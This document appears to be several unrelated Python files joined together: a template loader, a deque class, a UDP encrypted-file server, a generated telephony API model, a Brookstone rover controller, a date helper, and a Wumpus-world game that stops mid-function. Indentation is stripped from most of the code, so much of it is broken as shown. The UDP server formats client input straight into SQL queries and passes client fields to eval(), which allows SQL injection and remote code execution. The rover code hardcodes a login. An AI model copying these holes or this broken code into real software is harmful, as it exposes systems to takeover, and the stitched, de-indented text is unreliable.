            self.__path = path
        # Set a new extension if it differs from the default
        if extension != self.__temp_extension:
            self.__temp_extension = extension
        # Set the templates from the template list
        self.__set_templates()
def __set_template_list(self, temp_dict={}):
"""Método privado __set_template_list
- Percorre uma dict para forçar que seja usada somente a
- primeira posição e atribui o resultado ao atributo privado
- __template_list (list).
Argumentos:
- self (object): instância da própria classe
- temp_dict (dict): dict herdada do yaml (default=dict vazio)
Retorno:
- Sem retorno
"""
template_list = []
# Percorre a dict para atribuir a uma list
for i in temp_dict:
template_list.append(temp_dict[i])
# Atribui à nova lista somente a primeira posição da list
self.__template_list = template_list[0]
def get_template_list(self):
"""Método público get_template_list
- Retorna a lista dos templates disponíveis.
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__template_list (lsit): lista de templates
"""
return self.__template_list.get_data_list()
def __set_templates(self, path=None, extension=None):
"""Método privado __set_templates
- Obtém os templates contidos na lista de templates e
- atribui no atributo privado __templates (list).
Argumentos:
- self (object): instância da própria classe
- path (string): caminho dos arquivos dos templates (default=None)
- extension (string): extensão dos arquivos (default=None)
Retorno:
- Sem retorno
"""
# Se não foi definido um template, obtém do padrão
if not path:
path = self.__path
# Se não foi definido uma extensão, obtém do padrão
if not extension:
extension = self.__temp_extension
temps = []
# Faz um loop pela lista de templates para obtê-los
for i in self.get_template_list():
try:
template = open(path+i+extension,"r", encoding='utf-8')
temps.append(template.read())
template.close()
except IOError:
TemplateException("O arquivo "+i+extension+" não foi encontrado!")
exit(1)
# Seta o resultado no atriburo templates
self.__templates = temps
def get_templates(self):
"""Método público get_templates
- Retorna todos os templates (list).
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__templates (list): lista com os templates
"""
return self.__templates
def __str__(self):
"""Método público
- Retorna todos os templates em uma única string.
Argumentos:
- self (object): instância da própria classe
Retorno:
- self.__templates (string): templates em uma única string
"""
# Junta todas as posições da list em uma string
return str("".join(self.get_templates()))
def __call__(self, term):
if term == "string":
return str(self)
class Header(object):
def __init__(self, dict_):
self.__dict__ = dict_
class StaticTemplate(object):
def __init__(self, file_=None, path_='_static'):
template_f = open(os.path.join(path_, file_), 'r', encoding='utf-8')
static_temp = template_f.read()
template_f.close()
del template_f
import re
re_reader = re.search(r'^(---)([\n\S\s])+\n(---)', static_temp)
if re_reader is not None:
            header = yaml.safe_load(re_reader.group(0).replace('---',''))
static_temp = re.sub(r'^(---)([\n\S\s])+\n(---)', '', static_temp)
else:
header = {'layout':None, 'route':None, 'title':None}
self.base = static_temp
self.data = Header(header)
if __name__ == '__main__':
pass
|
'''
@Description:
@Date: 2020-04-13 20:50:06
@Author: Wong Symbol
@LastEditors: Wong Symbol
@LastEditTime: 2020-05-30 17:17:50
'''
'''
Double-ended queue (deque)
Elements can be enqueued and dequeued at both ends of the queue.
'''
class Node:
def __init__(self, data=None):
self.data = data
self._next = None
# Double-ended queue
class Deque:
def __init__(self, _head=None, _tail=None):
self._head = _head
self._tail = _tail
def push_front(self, val):
new_node = Node(val)
if self._head == None:
self._head = new_node
self._tail = new_node
else:
new_node._next = self._head
self._head = new_node
def push_back(self, val):
new_node = Node(val)
if self._head == None:
self._head = new_node
self._tail = new_node
else:
self._tail._next = new_node
self._tail = new_node
def pop_front(self):
head = self._head
if head:
val = head.data
self._head = head._next
return val
return -1
    # With singly linked nodes this method is awkward to implement: the node just
    # before the tail is not directly reachable, so a traversal with two pointers
    # is needed; doubly linked nodes would make pop_back O(1).
    def pop_back(self):
        tail = self._tail
        if tail is None:
            return -1
        val = tail.data
        if self._head is tail:
            # only one node left
            self._head = self._tail = None
        else:
            # walk to the node just before the tail
            prev = self._head
            while prev._next is not tail:
                prev = prev._next
            prev._next = None
            self._tail = prev
        return val
def show(self):
head = self._head
while head:
print(head.data)
head = head._next
if __name__ == "__main__":
d = Deque()
d.push_front(1)
d.push_front(2)
d.push_back(3)
print(d.pop_front())
print(d.pop_front())
print(d.pop_front())
d.show()
print('#'*4)
# print('tail:', d._tail.data)
# print('head:', d._head.data)
|
import logging
import auth
import json
import socket
import jwt
import argparse
import encrypt
import pre
import chain
from gmssl import sm2
success_res = json.dumps({
'status': '200',
'msg': ''
})
error_res = lambda msg: json.dumps({
'status': '401',
'msg': msg
})
parser = argparse.ArgumentParser(description='chatroom server')
parser.add_argument('-p', metavar='PORT', type=int, default=51742,
help='UDP port (default 51742)')
args = parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', args.p))
logging.basicConfig(level=logging.INFO)
logging.info('crypto server established')
MAX_BYTES = 4096
clients = {}
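
# A minimal client-side sketch (hypothetical helper, not part of the original
# server loop): the server speaks JSON over UDP, so a 'TEST' request is enough
# to check that it is reachable. Host and port mirror the server's own defaults.
def ping_server(host='127.0.0.1', port=51742):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client.sendto(json.dumps({'mode': 'TEST'}).encode('ascii'), (host, port))
    reply, _ = client.recvfrom(MAX_BYTES)
    return json.loads(reply.decode('ascii'))
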
while True:
req_data, address = sock.recvfrom(MAX_BYTES)
req_data = req_data.decode('ascii')
logging.info('the server received {}'.format(req_data))
j_parsed = json.loads(req_data)
mode = j_parsed['mode']
if mode == 'REGISTER':
res_data = auth.register(j_parsed['username'], j_parsed['pubkey'])
elif mode == 'LOGIN':
res_data = auth.login(j_parsed['username'],
j_parsed['timeval'], j_parsed['signature'])
if address not in clients.values():
clients[j_parsed['username']] = address
elif mode == 'TEST':
res_data = success_res
else:
try:
            claims = jwt.decode(j_parsed['jwt'].encode('ascii'),
                                auth.jwt_secret, algorithms=['HS256'])
except:
res_data = error_res('you have not logged in')
else:
file_progress = 'collecting {}: {}/{} bytes % {:.2f}'
if mode == 'UP':
file_length = int(j_parsed['length'])
file_name = j_parsed['name']
file_data = b''
res_data = json.dumps({
'status': '201',
'msg': 'ready'
})
sock.sendto(res_data.encode('ascii'), address)
logging.info('receiving file from {}:{}'.format(*address))
# collect file fragments
while len(file_data) < file_length:
# \x1b[2K\r
percent = 100 * len(file_data) / file_length
print(file_progress \
.format(file_name, len(file_data), file_length, percent))
file_frag, up_addr = sock.recvfrom(MAX_BYTES)
if address == up_addr:
file_data += file_frag
print('\x1b[2K', end='\r')
logging.info('{} received total length {} bytes' \
.format(file_name, file_length))
# encrypt to .enc file
enc_result = encrypt.encrypt(file_data)
with open('documents/%s.enc' % file_name, 'wb') as f:
f.write(enc_result['enc'])
# update database
sql = """
INSERT INTO Files (Filename, Uploader, Pubkey, Pvtkey, length)
VALUES ('{}', '{}', '{}', '{}', '{}')
""".format(file_name, claims['username'],
enc_result['pubkey'], enc_result['pvtkey'], len(enc_result['enc']))
pre.insert(sql)
logging.info('database file list updated')
res_data = success_res
elif mode == 'DOWN':
file_name = j_parsed['name']
sql = "SELECT Pvtkey, Length FROM Files WHERE FileName='%s'" % file_name
selected = pre.select(sql)[0]
file_length = selected[1]
# encrypt file-pvt key with user's pubkey
sm2_crypt = sm2.CryptSM2(public_key=claims['pubkey'], private_key='')
res_data = json.dumps({
'status': '200',
'enc_pvtkey': selected[0],
'length': file_length
})
sock.sendto(res_data.encode('ascii'), address)
logging.info('the server sent {}'.format(res_data))
# fragment and send files
sent_len = 0
with open('documents/%s.enc' % file_name, 'rb') as f:
while sent_len < file_length:
percent = 100 * sent_len / file_length
print(file_progress \
.format(file_name, sent_len, file_length, percent))
sock.sendto(f.read(MAX_BYTES), address)
sent_len += MAX_BYTES
logging.info('{} sent total length {} bytes' \
.format(file_name, file_length))
res_data = success_res
elif mode == 'FILELIST':
sql = "SELECT DISTINCT FileName FROM Files"
selected = pre.select(sql)
res_data = json.dumps({
'status': '200',
'names': [item[0] for item in selected]
})
elif mode == 'CHAIN':
prev_visitor = j_parsed['pv']
file_name = j_parsed['name']
info = {
'time_stamp': eval(prev_visitor[0]),
'signature': eval(prev_visitor[1]),
'ip_addr': eval(prev_visitor[2]),
'id': eval(prev_visitor[3])
}
chain.chain(info, 'documents/%s.enc' % file_name)
res_data = success_res
# if mode == 'PUBLIC':
# message = '{}[{}]: {}'.format(claims['username'], time_stamp, j_parsed['msg'])
# for user in clients:
# try:
# sock.sendto(json.dumps({
# 'status': '200',
# 'msg': message
# }).encode('ascii'), clients[user])
# except:
# del clients[user]
# res_data = json.dumps({
# 'status': '200',
# 'msg': ''
# })
# elif mode == 'TO':
# message = '{}->{}[{}]: {}'.format(claims['username'], j_parsed['username'], time_stamp, j_parsed['msg'])
# try:
# sock.sendto(json.dumps({
# 'status': '200',
# 'msg': message
# }).encode('ascii'), clients[j_parsed['username']])
# res_data = json.dumps({
# 'status': '200',
# 'msg': message
# })
# except:
# del clients[user]
# res_data = json.dumps({
# 'status': '404',
# 'msg': 'target user offline'
# })
sock.sendto(res_data.encode('ascii'), address)
logging.info('the server sent {}'.format(res_data))
|
# -*- coding: utf-8 -*-
"""
ytelapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Body77(object):
"""Implementation of the 'body_77' model.
TODO: type model description here.
Attributes:
mfrom (string): A valid Ytel Voice enabled number (E.164 format) that
will be initiating the phone call.
to (string): Please enter multiple E164 number. You can add max 10
numbers. Add numbers separated with comma. e.g :
+12223334444,+15556667777
url (string): URL requested once the call connects
group_confirm_key (string): Define the DTMF that the called party
should send to bridge the call. Allowed Values : 0-9, #, *
group_confirm_file (GroupConfirmFileEnum): Specify the audio file you
want to play when the called party picks up the call
method (string): Specifies the HTTP method used to request the
required URL once call connects.
status_call_back_url (string): URL that can be requested to receive
notification when call has ended. A set of default parameters will
be sent here once the call is finished.
status_call_back_method (string): Specifies the HTTP methodlinkclass
used to request StatusCallbackUrl.
fall_back_url (string): URL requested if the initial Url parameter
fails or encounters an error
fall_back_method (string): Specifies the HTTP method used to request
the required FallbackUrl once call connects.
heart_beat_url (string): URL that can be requested every 60 seconds
during the call to notify of elapsed time and pass other general
information.
heart_beat_method (string): Specifies the HTTP method used to request
HeartbeatUrl.
timeout (int): Time (in seconds) we should wait while the call is
ringing before canceling the call
play_dtmf (string): DTMF Digits to play to the call once it connects.
0-9, #, or *
hide_caller_id (string): Specifies if the caller id will be hidden
record (bool): Specifies if the call should be recorded
record_call_back_url (string): Recording parameters will be sent here
upon completion
record_call_back_method (string): Method used to request the
RecordCallback URL.
transcribe (bool): Specifies if the call recording should be
transcribed
transcribe_call_back_url (string): Transcription parameters will be
sent here upon completion
"""
# Create a mapping from Model property names to API property names
_names = {
"mfrom":'From',
"to":'To',
"url":'Url',
"group_confirm_key":'GroupConfirmKey',
"group_confirm_file":'GroupConfirmFile',
"method":'Method',
"status_call_back_url":'StatusCallBackUrl',
"status_call_back_method":'StatusCallBackMethod',
"fall_back_url":'FallBackUrl',
"fall_back_method":'FallBackMethod',
"heart_beat_url":'HeartBeatUrl',
"heart_beat_method":'HeartBeatMethod',
"timeout":'Timeout',
"play_dtmf":'PlayDtmf',
"hide_caller_id":'HideCallerId',
"record":'Record',
"record_call_back_url":'RecordCallBackUrl',
"record_call_back_method":'RecordCallBackMethod',
"transcribe":'Transcribe',
"transcribe_call_back_url":'TranscribeCallBackUrl'
}
def __init__(self,
mfrom=None,
to=None,
url=None,
group_confirm_key=None,
group_confirm_file=None,
method=None,
status_call_back_url=None,
status_call_back_method=None,
fall_back_url=None,
fall_back_method=None,
heart_beat_url=None,
heart_beat_method=None,
timeout=None,
play_dtmf=None,
hide_caller_id=None,
record=None,
record_call_back_url=None,
record_call_back_method=None,
transcribe=None,
transcribe_call_back_url=None):
"""Constructor for the Body77 class"""
# Initialize members of the class
self.mfrom = mfrom
self.to = to
self.url = url
self.group_confirm_key = group_confirm_key
self.group_confirm_file = group_confirm_file
self.method = method
self.status_call_back_url = status_call_back_url
self.status_call_back_method = status_call_back_method
self.fall_back_url = fall_back_url
self.fall_back_method = fall_back_method
self.heart_beat_url = heart_beat_url
self.heart_beat_method = heart_beat_method
self.timeout = timeout
self.play_dtmf = play_dtmf
self.hide_caller_id = hide_caller_id
self.record = record
self.record_call_back_url = record_call_back_url
self.record_call_back_method = record_call_back_method
self.transcribe = transcribe
self.transcribe_call_back_url = transcribe_call_back_url
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
mfrom = dictionary.get('From')
to = dictionary.get('To')
url = dictionary.get('Url')
group_confirm_key = dictionary.get('GroupConfirmKey')
group_confirm_file = dictionary.get('GroupConfirmFile')
method = dictionary.get('Method')
status_call_back_url = dictionary.get('StatusCallBackUrl')
status_call_back_method = dictionary.get('StatusCallBackMethod')
fall_back_url = dictionary.get('FallBackUrl')
fall_back_method = dictionary.get('FallBackMethod')
heart_beat_url = dictionary.get('HeartBeatUrl')
heart_beat_method = dictionary.get('HeartBeatMethod')
timeout = dictionary.get('Timeout')
play_dtmf = dictionary.get('PlayDtmf')
hide_caller_id = dictionary.get('HideCallerId')
record = dictionary.get('Record')
record_call_back_url = dictionary.get('RecordCallBackUrl')
record_call_back_method = dictionary.get('RecordCallBackMethod')
transcribe = dictionary.get('Transcribe')
transcribe_call_back_url = dictionary.get('TranscribeCallBackUrl')
# Return an object of this model
return cls(mfrom,
to,
url,
group_confirm_key,
group_confirm_file,
method,
status_call_back_url,
status_call_back_method,
fall_back_url,
fall_back_method,
heart_beat_url,
heart_beat_method,
timeout,
play_dtmf,
hide_caller_id,
record,
record_call_back_url,
record_call_back_method,
transcribe,
transcribe_call_back_url)
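
# A short usage sketch (hypothetical values): build the model from an API-style
# dictionary and read the mapped attributes back. Only keys defined in the
# `_names` mapping above are used.
if __name__ == '__main__':
    body = Body77.from_dictionary({
        'From': '+15550000001',
        'To': '+15550000002,+15550000003',
        'Url': 'https://example.com/answer',
        'Timeout': 30,
        'Record': True,
    })
    print(body.mfrom, body.to, body.timeout, body.record)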
|
#!/usr/bin/env python
'''
This file is used when you want to control a single robot
i.e., the first rover that computer connects to
'''
import roslib; roslib.load_manifest('br_swarm_rover')
import socket
import array
class RovCon():
def __init__(self, networkCard):
self.nic = networkCard
self._robot_id = self.nic.split('.')[3]
# all Brookstone rovers v1.0 have same host and port numbers
self.host = '192.168.1.100'
self.port = 80
self.max_tcp_buffer = 2048
try:
self.move_socket = \
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.final_data = ''
self.init_connection()
except socket.error:
from sys import exit
exit()
def init_connection(self):
'''
        Initiates the main connection to a rover
'''
self.connect_rover()
# set up rover for communication
msg = ['GET /check_user.cgi?user=AC13&pwd=AC13 HTTP/1.1\r\nHost: ']
msg.append('192.168.1.100:80\r\n')
msg.append('User-Agent: WifiCar/1.0 CFNetwork/485.12.7 ')
msg.append('Darwin/10.4.0\r\nAccept: */*\r\nAccept-Language: ')
msg.append('en-us\r\nAccept-Encoding: gzip, deflate\r\n')
msg.append('Connection: keep-alive\r\n\r\n')
msg = ''.join(msg)
self.move_socket.send(msg)
# Get the return message
print ('Wait for HTML return msg')
data = ''
while len(data) == 0:
data = self.move_socket.recv(self.max_tcp_buffer)
print ('returned data', data)
# We have to close the socket and open it again
self.disconnect_rover()
self.connect_rover()
# send MO_O commands
for i in range(1, 4):
self.write_cmd(i)
print ('Wait for result on ' + str(i) + ' MO command')
data = ''
while len(data) == 0:
data = self.move_socket.recv(self.max_tcp_buffer)
print ('returned data', data)
# last data received is the image data
self.final_data = data
def connect_rover(self):
'''
Sets connection to the specified host and port
'''
try:
self.move_socket = \
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.move_socket.bind((self.nic, 0)) # bind to NIC
self.move_socket.connect((self.host, self.port))
self.move_socket.setblocking(1)
except socket.error:
print('Connection error. Make sure robot is on')
print('Exiting connection node...')
def disconnect_rover(self):
'''
Terminates main connection to rover
'''
self.move_socket.close()
def return_data(self):
'''
returns an ID necessary for the video socket
to initiate video socket connection with rover
'''
return self.final_data
def write_cmd(self, index):
'''
        Use this function to send commands to the robot
(e.g., move tracks)
'''
# Robot's Control Packets
# The left brake command is
        # 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
        # 0010 00 00 00 01 00 00 00 02 00
        # 02 is the byte that applies the left brake
        # and the right brake command is
        # 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
        # 0010 00 00 00 01 00 00 00 04 00
        # 04 is the byte that applies the right brake
# Left Wheel forward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 04 0a
# Right Wheel Forward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 01 0a
# Left Wheel Backward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 05 0a
# Right Wheel Backward
# 0000 4d 4f 5f 4f fa 00 00 00 00 00 00 00 00 00 00 02
# 0010 00 00 00 01 00 00 00 02 0a
        # index specifies which command to send
packet_len = 0
if index == 1:
packet_len = 22
elif index == 2:
packet_len = 48
elif index == 3:
packet_len = 23
elif index == 5:
packet_len = 24
elif index == 6:
packet_len = 24
elif index == 7:
packet_len = 24
elif index == 8:
packet_len = 24
elif index == 9:
packet_len = 22
elif index == 10:
packet_len = 23
elif index == 11:
packet_len = 23
elif index == 12:
packet_len = 24
elif index == 13:
packet_len = 24
cmd_buffer = array.array('c')
cmd_buffer.extend(['M', 'O', '_', 'O'])
for i in range(4, packet_len+1):
cmd_buffer.append('\0')
if index == 1:
cmd_buffer[4] = '\x02'
elif index == 2:
cmd_buffer[4] = '\x02'
cmd_buffer[15] = '\x1a'
cmd_buffer[23] = 'A'
cmd_buffer[24] = 'C'
cmd_buffer[25] = '1'
cmd_buffer[26] = '3'
cmd_buffer[36] = 'A'
cmd_buffer[37] = 'C'
cmd_buffer[38] = '1'
cmd_buffer[39] = '3'
elif index == 3:
cmd_buffer[4] = '\x04'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
elif index == 5: # left wheel Forward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x04'
cmd_buffer[24] = '\x0a'
elif index == 6: # left wheel Backward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x05'
cmd_buffer[24] = '\x0a'
elif index == 7: # right wheel Forward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x01'
cmd_buffer[24] = '\x0a'
elif index == 8: # right wheel backward
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
cmd_buffer[24] = '\x0a'
elif index == 9: # IR off(?)
cmd_buffer[4] = '\xff'
elif index == 10: # switches infrared LED on
cmd_buffer[4] = '\x0e'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x5e'
elif index == 11: # switches infrared LED off
cmd_buffer[4] = '\x0e'
cmd_buffer[15] = '\x01'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x5f'
elif index == 12: # stop left track
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x02'
cmd_buffer[24] = '\x00'
elif index == 13: # stop right track
cmd_buffer[4] = '\xfa'
cmd_buffer[15] = '\x02'
cmd_buffer[19] = '\x01'
cmd_buffer[23] = '\x04'
cmd_buffer[24] = '\x00'
msg = cmd_buffer.tostring()
self.move_socket.send(msg)
# robot's speed is ~2 feet/second
# commands go as:
# self.write_cmd(left track)
# self.write_cmd(right track)
def move_forward(self):#distance, speed):
'''
Initiate move forward commands (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
self.write_cmd(7)
# delta_time = time.time() - init_time
def move_backward(self):#distance, speed):
'''
Move robot backwards (moves both tracks)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
self.write_cmd(8)
# delta_time = time.time() - init_time
def turn_left(self):#distance, speed):
'''
        Turn the robot left (tracks move in opposite directions)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
self.write_cmd(7)
# delta_time = time.time() - init_time
def turn_right(self):#distance, speed):
'''
        Turn the robot right (tracks move in opposite directions)
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
self.write_cmd(8)
# delta_time = time.time() - init_time
def move_left_forward(self):#distance, speed):
'''
Moves the left track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(7)
# delta_time = time.time() - init_time
def move_right_forward(self):#distance, speed):
'''
Moves the right track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(5)
# delta_time = time.time() - init_time
def move_left_backward(self):#distance, speed):
'''
Moves the left track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(8)
# delta_time = time.time() - init_time
def move_right_backward(self):#distance, speed):
'''
Moves the right track only
'''
# TODO: implement PWD function for speed
# speed = 2
# move_time = distance/speed
# init_time = time.time()
# delta_time = 0
# while delta_time <= move_time:
self.write_cmd(6)
# delta_time = time.time() - init_time
def stop_tracks(self):
'''
Stop tracks from moving
'''
self.write_cmd(12)
self.write_cmd(13)
def set_move(self, move_order):
'''
Tells robot where to move based on the published command
'''
if 'forward'+self._robot_id in move_order.data:
self.move_forward()
elif 'backward'+self._robot_id in move_order.data:
self.move_backward()
elif 'TuLef'+self._robot_id in move_order.data:
self.turn_left()
elif 'TuRi'+self._robot_id in move_order.data:
self.turn_right()
elif 'LefFor'+self._robot_id in move_order.data:
self.move_left_forward()
elif 'RiFor'+self._robot_id in move_order.data:
self.move_right_forward()
elif 'LefBa'+self._robot_id in move_order.data:
self.move_left_backward()
elif 'RiBa'+self._robot_id in move_order.data:
self.move_right_backward()
elif 'stop'+self._robot_id in move_order.data:
self.stop_tracks()
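
# A hedged usage sketch (hypothetical local interface address): RovCon opens a
# TCP connection to the rover during construction, so this only does anything
# useful with a real Brookstone rover on the local network. All methods used
# here are defined above.
if __name__ == '__main__':
    rover = RovCon('192.168.1.101')  # address of the local NIC to bind to
    rover.move_forward()
    rover.stop_tracks()
    rover.disconnect_rover()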
|
import datetime
def compare_time(time1, time2):
d1 = datetime.datetime.strptime(time1, '%Y-%m-%d %H:%M:%S')
d2 = datetime.datetime.strptime(time2, '%Y-%m-%d %H:%M:%S')
delta = d1 - d2
print("days is %s"%delta.days)
if delta.days >= 30:
return True
else:
return False
time1 = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
time2 = '2020-04-26 00:00:00'
compare_time(time1,time2)
|
import random, json, os
# We are assuming the following moves:
# Moves that change your orientation
# Up
# Down
# Left
# Right
# A move that changes your position
# Step
# The move that allows you to exit the board
# Exit
# Other actions that change the world aside from your position
# PickUp
# Shoot
# The function update will return a vector of strings that represent:
# (smell, air, glitter, bump, scream, location, orientation, status, score)
# The possible values are:
# Smell - clean|nasty
# Air - calm|breeze
# Glitter - bare|glitter
# Bump - no_bump|bump
# Scream - quiet|scream
# Location - unique identifier for current square
# Orientation - the direction you are facing
# Status - living|dead|won
# Score - current score
# You get precept vectors by calling take_action with the name of your world and the
# move you want to take.
def take_action(world_token,move):
world = get_world(world_token)
location = world["location"]
orientation = world["orientation"]
points = world["points"]
status = world["status"]
arrows = world["arrows"]
print "\n*********************************\n"
if status == "dead":
print "You are dead. Start a new game"
return
elif move == "Exit":
update = update_location(world, location, orientation)
if world["location"] != "Cell 11":
print "You need to get back to Cell 11 to exit"
elif world["points"] == 0:
print "You need to score some points in order to exit"
else:
update[7] = "won"
elif move == "Toss":
if world["rocks"] <= 0:
print "You are out of rocks"
return
else:
world["rocks"] = world["rocks"] - 1
print "Tossing a rock. You have " + str(world["rocks"]) + " left."
store_world(world_token,world)
cell_state = world[world[location][orientation]]
if cell_state["Pit"] is True:
return "Quiet"
else:
return "Clink"
elif move == "Step":
print "Taking a step"
new_location = world[location][orientation]
if new_location == "Void":
print "You bumped your head on the edge of the world."
update = update_location(world, location, orientation)
update[3] = "bump"
else:
print "Moving to " + str(new_location)
update = update_location(world, new_location, orientation)
world["location"] = new_location
elif move in["Up","Down","Left","Right"]:
print "Turing to face " + move
update = update_location(world, location, move)
world["orientation"] = move
elif move == "PickUp":
print "Trying to pick up gold"
if got_gold(world, location):
print "You've picked up some gold!"
print "You get 1000 more points!"
update = update_location(world, location, orientation)
update[2] = "bare"
world[location]["Gold"] = False
world["points"] = world["points"]+1000
else:
print "There is no gold here!"
update = update_location(world, location, orientation)
elif move == "Shoot":
print "Trying to shoot the Wumpus"
if world["arrows"] <= 0:
print "You are out of arrows"
elif wumpus_in_sight(world,location, orientation):
print "You killed the Wumpus!"
print "You get 100 more points!"
wumpus_location = where_is_the_Wumpus(world,location,orientation)
world[wumpus_location]["Wumpus"] = False
world["points"] = world["points"]+100
else:
print "You missed the Wumpus!"
update = update_location(world, location, orientation)
world["arrows"] = world["arrows"] - 1
print "Perception = (" + ", ".join(update) + ")"
world["status"] = update[7]
store_world(world_token,world)
update[8] = world["points"]
return update
# Update_location figures out the perceptual elements associated with a location by
# checking for gold, pits and the Wumpus
def update_location(world,location,orientation):
location_info = world[location]
baseline = ["clean","calm","bare","no_bump","quiet",location, orientation, "living", str(world["points"])]
if got_gold(world, location):
print "There is a lovely glitter in the room"
baseline[2] = "glitter"
if got_breeze(world, location):
print "There is a breeze running through this room"
baseline[1] = "breeze"
if got_smell(world, location):
print "There is a nasty smell in here"
baseline[0] = "nasty"
if location_info["Wumpus"] is True:
print "You got killed by the Wumpus and it was shockingly painful"
baseline[7] = "dead"
elif location_info["Pit"] is True:
print "You fell into a pit and died a slow and scary death"
baseline[7] = "dead"
return baseline
# Various tests to figure out precept list.
# Is there gold in this cell?
def got_gold(world, location):
return world[location]["Gold"]
# Do any of the adjacent cells have Pits in them?
def got_breeze(world,location):
for x in world[location]["Next"]:
if world[x]["Pit"]:
return True
return False
# Do any of the adjacent cells have the Wumpus?
def got_smell(world,location):
for x in world[location]["Next"]:
if world[x]["Wumpus"] is True:
return True
return False
# Is the Wumpus in the agent's line of sight?
def wumpus_in_sight(world, location, orientation):
next_location = world[location][orientation]
if next_location == "Void":
return False
elif world[next_location]["Wumpus"] is True:
return True
else:
return wumpus_in_sight(world, next_location, orientation)
# Where is the Wumpus in the agent's line of sight?
def where_is_the_Wumpus(world, location, orientation):
next_location = world[location][orientation]
if world[location]["Wumpus"] is True:
return location
else:
return where_is_the_Wumpus(world, next_location, orientation)
# look_ahead
def look_ahead(world_token):
world = get_world(world_token)
return world[world["location"]]["Next"]
# Build out the dictionary that makes up the simple world that we have been looking at
def build_world(gold, wumpus, pits):
layout = {}
height = 4
width = 4
for x in range(1,width+1):
for y in range(1,height+1):
new_cell = {}
new_cell["Up"] = "Void"
new_cell["Down"] = "Void"
new_cell["Left"] = "Void"
new_cell["Right"] = "Void"
new_cell["Wumpus"] = False
new_cell["Pit"] = False
new_cell["Gold"] = False
new_cell["Next"] = []
if y < 4:
new_cell["Up"] = "Cell " + str(x) + str(y+1)
new_cell["Next"].append(new_cell["Up"])
if y > 1:
new_cell["Down"] = "Cell " + str(x) + str(y-1)
new_cell["Next"].append(new_cell["Down"])
if x < 4:
new_cell["Right"] = "Cell " + str(x+1) + str(y)
new_cell["Next"].append(new_cell["Right"])
if x > 1:
new_cell["Left"] = "Cell " + str(x-1) + str(y)
new_cell["Next"].append(new_cell["Left"])
layout["Cell "+str(x)+str(y)] = new_cell
layout[wumpus]["Wumpus"]=True
print "There is a Wumpus in cell " + wumpus + "."
layout[gold]["Gold"]=True
print "There is Gold in cell " + gold + "."
for cell in pits:
layout[cell]["Pit"]=True
print "There is a Pit in cell " + cell + "."
print
return layout
# In order to have a persistent world, we are going to store and update it as the
# game progresses.
# We first initialize the state of the world and return a random token to the user
# so that they can refer to the world that they are playing in
def intialize_world():
world_name = "Wumpus" + str(random.randint(0,10000))
print "\n*********************************\n"
print "Initializing your new Wumpus world!"
print "Your new world is called: "+ world_name
if not os.path.exists("WumpusWorldDataFolder"):
os.makedirs("WumpusWorldDataFolder")
world=build_world("Cell 32", "Cell 13", ["Cell 31","Cell 33","Cell 44"])
world["location"] = "Cell 11"
world["orientation"] = "Right"
world["status"] = "living"
world["points"] = 0
world["arrows"] = 1
world["rocks"] = 5
print "You are starting in Cell 11, looking to the Right."
print "You are starting with 0 points, " + str(world["arrows"]) + " arrow(s)."
print "You have " + str(world["rocks"]) + " rocks."
print "You are alive."
with open("WumpusWorldDataFolder/"+world_name+".json", 'w') as worldfile:
json.dump(world, worldfile)
worldfile.close()
return world_name
# In order to have a persistent world, we are going to store and update it as the
# game progresses.
# We first initialize the state of the world and return a random token to the user
# so that they can refer to the world that they are playing in
def intialize_my_world(gold,wumpus,pits):
